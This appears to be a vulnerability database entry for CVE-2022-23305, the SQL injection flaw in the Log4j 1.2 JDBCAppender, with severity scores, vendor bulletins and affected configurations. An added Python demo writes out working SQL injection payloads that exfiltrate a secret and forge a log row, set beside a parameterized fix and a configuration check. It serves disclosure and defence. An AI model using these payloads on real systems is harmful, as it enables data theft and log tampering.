Vulnerability Name:

CVE-2022-23305 (CCN-217461)

Assigned:2022-01-18
Published:2022-01-18
Updated:2023-02-24
Summary:By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
CVSS v3 Severity:9.8 Critical (CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
9.4 Critical (Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): High
Integrity (I): High
Availability (A): High
6.5 Medium (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
6.2 Medium (CCN Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
8.8 High (REDHAT CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
8.4 High (REDHAT Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): High
Integrity (I): High
Availability (A): High
CVSS v2 Severity:6.8 Medium (CVSS v2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P)
Exploitability Metrics:Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): None
Impact Metrics:Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
6.4 Medium (CCN CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Metrics:Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (Au): None
Impact Metrics:Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): None
Vulnerability Type:CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')
Vulnerability Consequences:Data Manipulation
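The summary above describes the mechanism in one sentence: the JDBCAppender's `sql` property is a literal SQL string, PatternLayout substitutes `%m` with the raw log message, and the result is executed as-is. The block below is an added example written for this page, not code from Apache Log4j or from the advisory. It re-creates that behaviour in pure Python against an in-memory SQLite database so the three consequences can be seen side by side: a logged message that reads another table into the log (confidentiality), one that appends a forged log row (integrity), and an ordinary apostrophe that makes the appender throw (the "by design" quoting problem even without an attacker). The parameterized variant mirrors what Log4j 2's re-introduced JDBC appender does with bound columns. The table names, payloads and properties file are constructed for the demo; the class name `org.apache.log4j.jdbc.JDBCAppender` and the `sql` key are the real log4j 1.2 configuration names, and the `jdbc_appender_sql_templates` check is the quick "is this deployment even in scope" test the note in the summary calls for.

```python
"""CVE-2022-23305: how the log4j 1.2 JDBCAppender pattern becomes SQL injection.

Added example, not code from Apache Log4j or from this advisory. It re-creates
the documented behaviour in pure Python against an in-memory SQLite database:
the appender takes a literal SQL string containing PatternLayout converters
(here %m) and substitutes the log message textually before executing it.
Table names, payloads and the properties file are constructed for the demo.
"""
import sqlite3

# Constructed SQL template of the kind the advisory describes: %m is spliced
# into a quoted literal, so any quote in a logged message changes the query.
VULNERABLE_SQL_TEMPLATE = "INSERT INTO LOGS (Message) VALUES ('%m')"

# Constructed attacker inputs, e.g. a request header the application logs.
EXFIL_PAYLOAD = "x' || (SELECT Secret FROM USERS WHERE Name='admin') || '"
FORGE_PAYLOAD = "x'), ('forged audit entry"
BENIGN_APOSTROPHE = "O'Brien logged in"


def render_pattern(template, message):
    """Mimic PatternLayout: %m is replaced with the raw message, no escaping."""
    return template.replace("%m", message)


def setup_db():
    """In-memory schema with a log table and a table worth stealing from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LOGS (Message TEXT)")
    conn.execute("CREATE TABLE USERS (Name TEXT, Secret TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('admin', 's3cret-token')")
    return conn


def read_log(conn):
    return [row[0] for row in conn.execute("SELECT Message FROM LOGS ORDER BY rowid")]


def demo_vulnerable(message):
    """Log4j 1.2 style: execute the rendered string as-is (the flaw)."""
    conn = setup_db()
    try:
        conn.execute(render_pattern(VULNERABLE_SQL_TEMPLATE, message))
    except sqlite3.Error as exc:
        # A plain apostrophe in a message already breaks the statement.
        return {"rows": read_log(conn), "error": type(exc).__name__}
    return {"rows": read_log(conn), "error": None}


def demo_parameterized(message):
    """Log4j 2 style fix: the message travels as a bound parameter, so the
    same payloads are stored literally instead of being interpreted."""
    conn = setup_db()
    conn.execute("INSERT INTO LOGS (Message) VALUES (?)", (message,))
    return {"rows": read_log(conn), "error": None}


# Constructed log4j 1.x properties file for the exposure check below.
SAMPLE_LOG4J_PROPERTIES = """\
log4j.rootLogger=INFO, console, db
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.db=org.apache.log4j.jdbc.JDBCAppender
log4j.appender.db.URL=jdbc:mysql://db.internal/app
log4j.appender.db.sql=INSERT INTO LOGS (Message) VALUES ('%m')
"""


def jdbc_appender_sql_templates(properties_text):
    """Return {appender name: sql template} for every JDBCAppender declared in
    a log4j 1.x properties file. Any entry puts the deployment in scope for
    CVE-2022-23305; the default configuration has none."""
    appenders, templates = set(), {}
    for line in properties_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        parts = key.split(".")
        if len(parts) == 3 and parts[:2] == ["log4j", "appender"]:
            if value.endswith("JDBCAppender"):
                appenders.add(parts[2])
        elif len(parts) == 4 and parts[:2] == ["log4j", "appender"] and parts[3] == "sql":
            templates[parts[2]] = value
    return {name: templates.get(name) for name in appenders}


if __name__ == "__main__":
    print("exposed appenders:", jdbc_appender_sql_templates(SAMPLE_LOG4J_PROPERTIES))
    print("vulnerable, exfil:", demo_vulnerable(EXFIL_PAYLOAD))
    print("vulnerable, forged row:", demo_vulnerable(FORGE_PAYLOAD))
    print("vulnerable, apostrophe:", demo_vulnerable(BENIGN_APOSTROPHE))
    print("parameterized:", demo_parameterized(EXFIL_PAYLOAD))
```

The exfiltration payload works with a single INSERT, which matters because many JDBC drivers refuse stacked statements: the attacker does not need a second statement, only a subquery or concatenation inside the value the appender is already writing. That is also why the fix is parameterization rather than filtering semicolons.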
References:Source: MITRE
Type: CNA
CVE-2022-23305

Source: security@apache.org
Type: Mailing List, Third Party Advisory
security@apache.org

Source: XF
Type: UNKNOWN
apache-cve202223305-sql-injection(217461)

Source: security@apache.org
Type: Issue Tracking, Mailing List, Vendor Advisory
security@apache.org

Source: CCN
Type: Apache Web site
Apache log4j 1.2

Source: security@apache.org
Type: Vendor Advisory
security@apache.org

Source: CCN
Type: oss-sec Mailing List, Tue, 18 Jan 2022 14:42:35 +0000
CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1

Source: security@apache.org
Type: Third Party Advisory
security@apache.org

Source: CCN
Type: IBM Security Bulletin 6550822 (Db2 Web Query for i)
Due to use of Apache Log4j, IBM Db2 Web Query for i is vulnerable to arbitrary code execution (CVE-2021-4104, CVE-2022-23302, and CVE-2022-23307) and SQL injection (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6551856 (Netezza Analytics for NPS)
Log4j vulnerabilities affect IBM Netezza Analytics for NPS

Source: CCN
Type: IBM Security Bulletin 6553876 (App Connect for Healthcare)
IBM App Connect for Healthcare is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6554466 (Netezza Analytics)
Log4j vulnerabilities affect IBM Netezza Analytics

Source: CCN
Type: IBM Security Bulletin 6557200 (Sterling Connect:Direct Web Services)
IBM Sterling Connect:Direct Web Services is vulnerable to SQL injection due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6557248 (WebSphere Application Server)
IBM WebSphere Application Server and IBM WebSphere Application Server Liberty are vulnerable to arbitrary code execution and SQL injection due to Apache Log4j. (CVE-2022-23302, CVE-2022-23307, CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6563857 (Tivoli Netcool/OMNIbus)
Due to use of Apache Log4j, IBM Netcool/OMNIbus Probe DSL Factory Framework is vulnerable to arbitrary code execution (CVE-2022-23302, CVE-2022-23307) and SQL injection (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6565005 (Cloud Pak for Data System)
Vulnerability in Apache Log4j affects IBM Cloud Pak for Data System 1.0

Source: CCN
Type: IBM Security Bulletin 6565383 (Cloudera Enterprise Data Hub)
Cloudera Data Platform Private Cloud Base with IBM products have log messages vulnerable to arbitrary code execution, denial of service, remote code execution, and SQL injection due to Apache Log4j vulnerabilities

Source: CCN
Type: IBM Security Bulletin 6568539 (UrbanCode Deploy)
IBM Urbancode Deploy impacted by Apache Log4j SQL Injection vulnerability. (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6568675 (Spectrum Discover)
IBM Spectrum Discover is vulnerable to Docker CLI (CVE-2021-41092) and Apache Log4j (CVE-2021-4104, CVE-2022-23302, CVE-2022-23305, CVE-2022-23307) weaknesses

Source: CCN
Type: IBM Security Bulletin 6568731 (App Connect Enterprise)
IBM App Connect Enterprise & IBM Integration Bus are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2022-23307, CVE-2022-23302) and SQL injection due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6569143 (Tivoli Netcool/Impact)
IBM Tivoli Netcool Impact is affected by an Apache Log4j vulnerability (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6569997 (Sterling Order Management)
Apache Log4j vulnerability

Source: CCN
Type: IBM Security Bulletin 6584095 (Curam SPM)
Curam Social Program Management is vulnerable to arbitrary code execution and SQL injection issues due to Apache Log4j (CVE-2022-23302, CVE-2022-23305, CVE-2022-23307)

Source: CCN
Type: IBM Security Bulletin 6585004 (CCA for MTM 4767 for Linux x64)
Crypto Hardware Initialization and Maintenance is vulnerable to arbitrary code execution due to Apache Log4j (CVE 2021-4104, CVE 2022-23302, CVE 2022-23305, CVE 2022-23307)

Source: CCN
Type: IBM Security Bulletin 6590835 (Cloud Pak System)
Multiple vulnerabilities in Apache Log4j affect IBM Cloud Pak System

Source: CCN
Type: IBM Security Bulletin 6591309 (Cognos Controller)
IBM Cognos Controller is affected but not vulnerable to arbitrary code execution and SQL injection due to Apache Log4j v1 vulnerabilities (CVE-2022-23305, CVE-2022-23302, CVE-2021-4104)

Source: CCN
Type: IBM Security Bulletin 6591351 (Telco Network Cloud Manager)
IBM Telco Network Cloud Manager - Performance is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832,CVE-2022-23302 and CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6600099 (OpenPages with Watson)
IBM OpenPages with Watson has addressed Apache Log4j vulnerability (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6606301 (Cloud Pak for Multicloud Management)
IBM Cloud Pak for Multicloud Management Monitoring is potentially vulnerable to execution of arbitrary code due to its use of Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6606605 (Log Analysis)
Multiple vulnerabilities in log4j-1.2.16.jar used by IBM Operations Analytics - Log Analysis

Source: CCN
Type: IBM Security Bulletin 6610084 (Data Risk Manager)
IBM Data Risk Manager is affected by multiple vulnerabilities including remote code execution in Apache Log4j 1.x

Source: CCN
Type: IBM Security Bulletin 6829357 (InfoSphere Information Server)
IBM InfoSphere Information Server may be affected by vulnerabilities in Apache log4j 1.x version

Source: CCN
Type: IBM Security Bulletin 6830971 (Sterling Order Management)
IBM Sterling Order Management migration strategy to Apache Log4j vulnerability (see CVEs below)

Source: CCN
Type: IBM Security Bulletin 6840121 (Operations Analytics Predictive Insights)
IBM Operations Analytics Predictive Insights impacted by Apache Log4j vulnerabilities (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6848225 (Netcool Operations Insight)
Netcool Operations Insight v1.6.7 contains fixes for multiple security vulnerabilities.

Source: CCN
Type: IBM Security Bulletin 6848507 (Integrated Analytics System)
Vulnerability in Log4j affects IBM Integrated Analytics System [CVE-2022-23305]

Source: CCN
Type: Oracle CPUApr2022
Oracle Critical Patch Update Advisory - April 2022

Source: security@apache.org
Type: Patch, Third Party Advisory
security@apache.org

Source: CCN
Type: Oracle CPUJul2022
Oracle Critical Patch Update Advisory - July 2022

Source: security@apache.org
Type: Patch, Third Party Advisory
security@apache.org

Vulnerable Configuration:
  Configuration RedHat 1:
  • cpe:/a:redhat:enterprise_linux:8:*:*:*:*:*:*:*
  Configuration RedHat 2:
  • cpe:/a:redhat:enterprise_linux:8::appstream:*:*:*:*:*
  Configuration RedHat 3:
  • cpe:/o:redhat:enterprise_linux:7:*:*:*:*:*:*:*
  Configuration RedHat 4:
  • cpe:/o:redhat:enterprise_linux:7::client:*:*:*:*:*
  Configuration RedHat 5:
  • cpe:/o:redhat:enterprise_linux:7::computenode:*:*:*:*:*
  Configuration RedHat 6:
  • cpe:/o:redhat:enterprise_linux:7::server:*:*:*:*:*
  Configuration RedHat 7:
  • cpe:/o:redhat:enterprise_linux:7::workstation:*:*:*:*:*
  Configuration RedHat 8:
  • cpe:/o:redhat:rhel_els:6:*:*:*:*:*:*:*

  Configuration CCN 1:
  • cpe:/a:apache:log4j:1.2:-:*:*:*:*:*:*
  AND
  • cpe:/a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:8.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:8.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:tivoli_netcool/impact:7.1.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:tivoli_netcool/omnibus:8.1.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:9.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.6:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_intelligence:12.2.1.3.0::~~enterprise~~~:*:*:*:*:*
  • OR cpe:/a:ibm:infosphere_information_server:11.7:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_intelligence:12.2.1.4.0::~~enterprise~~~:*:*:*:*:*
  • OR cpe:/a:ibm:app_connect:11.0.0.0:*:*:*:enterprise:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:6.2.7:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:7.0.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.0.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:17.0.0.3:*:*:*:liberty:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.1.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:7.0.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.2.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.2:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.2:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:integration_bus:10.0.0.6:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:21.0.0.12:*:*:*:liberty:*:*:*
  • OR cpe:/a:ibm:sterling_order_management:10:*:*:*:*:*:*:*

  • * Denotes that component is vulnerable
Oval Definitions
    Definition ID | Class | Title | Last Modified
    oval:org.opensuse.security:def:8038 | P | log4j12-javadoc-1.2.17-4.9.1 on GA media (Moderate) | 2023-06-20
    oval:org.opensuse.security:def:7714 | P | log4j12-1.2.17-4.9.1 on GA media (Moderate) | 2023-06-12
    oval:org.opensuse.security:def:3121 | P | krb5-appl-clients-1.0.3-1.2 on GA media (Moderate) | 2022-06-28
    oval:org.opensuse.security:def:3407 | P | xorg-x11-libs-7.6-45.14 on GA media (Moderate) | 2022-06-28
    oval:org.opensuse.security:def:94751 | P | log4j12-1.2.17-4.9.1 on GA media (Moderate) | 2022-06-22
    oval:org.opensuse.security:def:95037 | P | log4j12-javadoc-1.2.17-4.9.1 on GA media (Moderate) | 2022-06-22
    oval:com.redhat.rhsa:def:20220442 | P | RHSA-2022:0442: log4j security update (Important) | 2022-02-07
    oval:org.opensuse.security:def:119100 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:94457 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:922 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:93822 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:100743 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:119240 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:1184 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:118745 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:94036 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:101614 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:119430 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:100071 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:118935 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:94248 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:101845 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:119615 | P | Security update for log4j12 (Important) | 2022-01-28
    oval:org.opensuse.security:def:100409 | P | (Important) | 2022-01-28
    oval:org.opensuse.security:def:125736 | P | Security update for log4j (Important) | 2022-01-27
    oval:org.opensuse.security:def:6076 | P | Security update for log4j (Important) | 2022-01-27
    oval:org.opensuse.security:def:126902 | P | Security update for log4j (Important) | 2022-01-27
    oval:org.opensuse.security:def:127299 | P | Security update for log4j (Important) | 2022-01-27
    oval:org.opensuse.security:def:5278 | P | Security update for log4j (Important) | 2022-01-27
    oval:com.redhat.rhsa:def:20220290 | P | RHSA-2022:0290: parfait:0.5 security update (Important) | 2022-01-26